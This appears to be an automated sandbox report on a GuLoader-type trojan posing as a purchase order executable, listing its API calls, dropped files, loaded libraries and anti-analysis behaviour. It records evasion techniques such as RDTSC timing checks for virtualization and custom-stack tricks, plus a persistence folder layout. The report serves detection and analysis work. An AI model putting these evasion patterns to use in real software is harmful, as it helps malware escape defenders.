      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34840F305_2_34840F30
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34894F405_2_34894F40
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348068B85_2_348068B8
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348238E05_2_348238E0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484E8F05_2_3484E8F0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3488D8005_2_3488D800
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348228405_2_34822840
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3482A8405_2_3482A840
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348229A05_2_348229A0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348B59105_2_348B5910
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3483B9505_2_3483B950
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348369625_2_34836962
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3481EA805_2_3481EA80
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34865AA05_2_34865AA0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348BDAAC5_2_348BDAAC
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348CDAC65_2_348CDAC6
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348D7A465_2_348D7A46
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34893A6C5_2_34893A6C
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348DEB895_2_348DEB89
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348D6BD75_2_348D6BD7
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34895BF05_2_34895BF0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3485DBF95_2_3485DBF9
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348DAB405_2_348DAB40
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348DFB765_2_348DFB76
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: String function: 3480B970 appears 241 times
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: String function: 34855130 appears 55 times
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: String function: 3488EA12 appears 70 times
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: String function: 3489F290 appears 100 times
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: String function: 34867E54 appears 93 times
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Purchase Order Purchase Order Purchase Order Purchase Order.exe
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000003.2407137260.00000000345B2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Purchase Order Purchase Order Purchase Order Purchase Order.exe
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000003.2409235089.0000000034760000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Purchase Order Purchase Order Purchase Order Purchase Order.exe
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: classification engineClassification label: mal80.troj.evad.winEXE@3/8@0/1
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 0_2_0040338F EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersion,lstrlenA,LdrInitializeThunk,#17,OleInitialize,LdrInitializeThunk,SHGetFileInfoW,GetCommandLineW,CharNextW,LdrInitializeThunk,GetTempPathW,LdrInitializeThunk,GetTempPathW,GetWindowsDirectoryW,lstrcatW,LdrInitializeThunk,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,0_2_0040338F
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 0_2_00404722 GetDlgItem,SetWindowTextW,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,LdrInitializeThunk,MulDiv,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,SetDlgItemTextW,0_2_00404722
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 0_2_00402104 LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,LdrInitializeThunk,0_2_00402104
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumpsJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeFile created: C:\Users\user\AppData\Local\Temp\nsr584D.tmpJump to behavior
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exeReversingLabs: Detection: 27%
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeFile read: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe "C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe"
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeProcess created: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe "C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe"
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeProcess created: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe "C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe"Jump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: dwmapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: oleacc.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: riched20.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: usp10.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: Gullis.lnk.0.drLNK file: ..\..\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\lensaftalerne.sla
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000001.1989166062.0000000000649000.00000020.00000001.01000000.00000006.sdmp
      Source: Binary string: wntdll.pdbUGP source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmp, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000003.2409235089.0000000034633000.00000004.00000020.00020000.00000000.sdmp, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000003.2407137260.000000003448F000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmp, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000003.2409235089.0000000034633000.00000004.00000020.00020000.00000000.sdmp, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000003.2407137260.000000003448F000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mshtml.pdbUGP source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000001.1989166062.0000000000649000.00000020.00000001.01000000.00000006.sdmp

      Data Obfuscation

      barindex
      Yara detected GuLoader
      Source: Yara matchFile source: 00000000.00000002.1990093739.0000000003FB1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 0_2_70121B63 LdrInitializeThunk,GlobalAlloc,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,lstrcpyW,GlobalFree,LdrInitializeThunk,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,LdrInitializeThunk,LdrInitializeThunk,GetModuleHandleW,LdrInitializeThunk,LoadLibraryW,GetProcAddress,lstrlenW,0_2_70121B63
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 0_2_70122FD0 push eax; ret 0_2_70122FFE
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348109AD push ecx; mov dword ptr [esp], ecx5_2_348109B6
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeFile created: \purchase order purchase order purchase order purchase order.exe
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeFile created: \purchase order purchase order purchase order purchase order.exeJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeFile created: C:\Users\user\AppData\Local\Temp\nsh5948.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumpsJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\VedbendensJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Vedbendens\Hoveddelenes.haaJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\ClapJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Clap\Exoascaceous73.traJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\TidenderneJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Tidenderne\Atomizing.EftJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Tidenderne\Underemphasizing70.tioJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Tidenderne\sulkens.dicJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Tidenderne\KlapperesJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Tidenderne\Klapperes\vec.jpgJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Switches to a custom stack to bypass stack traces
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeAPI/Special instruction interceptor: Address: 476F6B9
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeAPI/Special instruction interceptor: Address: 334F6B9
      Tries to detect virtualization through RDTSC time measurements
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeRDTSC instruction interceptor: First address: 4733B9E second address: 4733B9E instructions: 0x00000000 rdtsc 0x00000002 test ah, dh 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F039C8178A6h 0x00000008 inc ebp 0x00000009 test dh, dh 0x0000000b inc ebx 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeRDTSC instruction interceptor: First address: 3313B9E second address: 3313B9E instructions: 0x00000000 rdtsc 0x00000002 test ah, dh 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F039D1785B6h 0x00000008 inc ebp 0x00000009 test dh, dh 0x0000000b inc ebx 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348E21AE rdtsc 5_2_348E21AE
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsh5948.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeAPI coverage: 0.3 %
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe TID: 4280Thread sleep time: -30000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 0_2_004059CC GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,0_2_004059CC
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 0_2_004065FD FindFirstFileW,FindClose,0_2_004065FD
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeFile opened: C:\Users\userJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeFile opened: C:\Users\user\AppDataJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer ShortcutsJump to behavior
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000002.2450313980.00000000047B8000.00000004.00000020.00020000.00000000.sdmp, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000002.2450313980.00000000047F6000.00000004.00000020.00020000.00000000.sdmp, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000003.2407548173.0000000004810000.00000004.00000020.00020000.00000000.sdmp, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000002.2450448721.0000000004810000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeAPI call chain: ExitProcess graph end nodegraph_0-4363
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeAPI call chain: ExitProcess graph end nodegraph_0-4368
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348E21AE rdtsc 5_2_348E21AE
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 0_2_0040264A MultiByteToWideChar,ReadFile,LdrInitializeThunk,MultiByteToWideChar,SetFilePointer,LdrInitializeThunk,MultiByteToWideChar,SetFilePointer,0_2_0040264A
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 0_2_70121B63 LdrInitializeThunk,GlobalAlloc,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,lstrcpyW,GlobalFree,LdrInitializeThunk,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,LdrInitializeThunk,LdrInitializeThunk,GetModuleHandleW,LdrInitializeThunk,LoadLibraryW,GetProcAddress,lstrlenW,0_2_70121B63
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34819486 mov eax, dword ptr fs:[00000030h]5_2_34819486
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34819486 mov eax, dword ptr fs:[00000030h]5_2_34819486
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348164AB mov eax, dword ptr fs:[00000030h]5_2_348164AB
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348074B0 mov eax, dword ptr fs:[00000030h]5_2_348074B0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348074B0 mov eax, dword ptr fs:[00000030h]5_2_348074B0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348434B0 mov eax, dword ptr fs:[00000030h]5_2_348434B0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348444B0 mov ecx, dword ptr fs:[00000030h]5_2_348444B0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3489A4B0 mov eax, dword ptr fs:[00000030h]5_2_3489A4B0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348E54DB mov eax, dword ptr fs:[00000030h]5_2_348E54DB
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348104E5 mov ecx, dword ptr fs:[00000030h]5_2_348104E5
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348B94E0 mov eax, dword ptr fs:[00000030h]5_2_348B94E0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34848402 mov eax, dword ptr fs:[00000030h]5_2_34848402
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34848402 mov eax, dword ptr fs:[00000030h]5_2_34848402
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34848402 mov eax, dword ptr fs:[00000030h]5_2_34848402
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3483340D mov eax, dword ptr fs:[00000030h]5_2_3483340D
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34897410 mov eax, dword ptr fs:[00000030h]5_2_34897410
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480E420 mov eax, dword ptr fs:[00000030h]5_2_3480E420
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480E420 mov eax, dword ptr fs:[00000030h]5_2_3480E420
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480E420 mov eax, dword ptr fs:[00000030h]5_2_3480E420
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480C427 mov eax, dword ptr fs:[00000030h]5_2_3480C427
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484A430 mov eax, dword ptr fs:[00000030h]5_2_3484A430
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484E443 mov eax, dword ptr fs:[00000030h]5_2_3484E443
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484E443 mov eax, dword ptr fs:[00000030h]5_2_3484E443
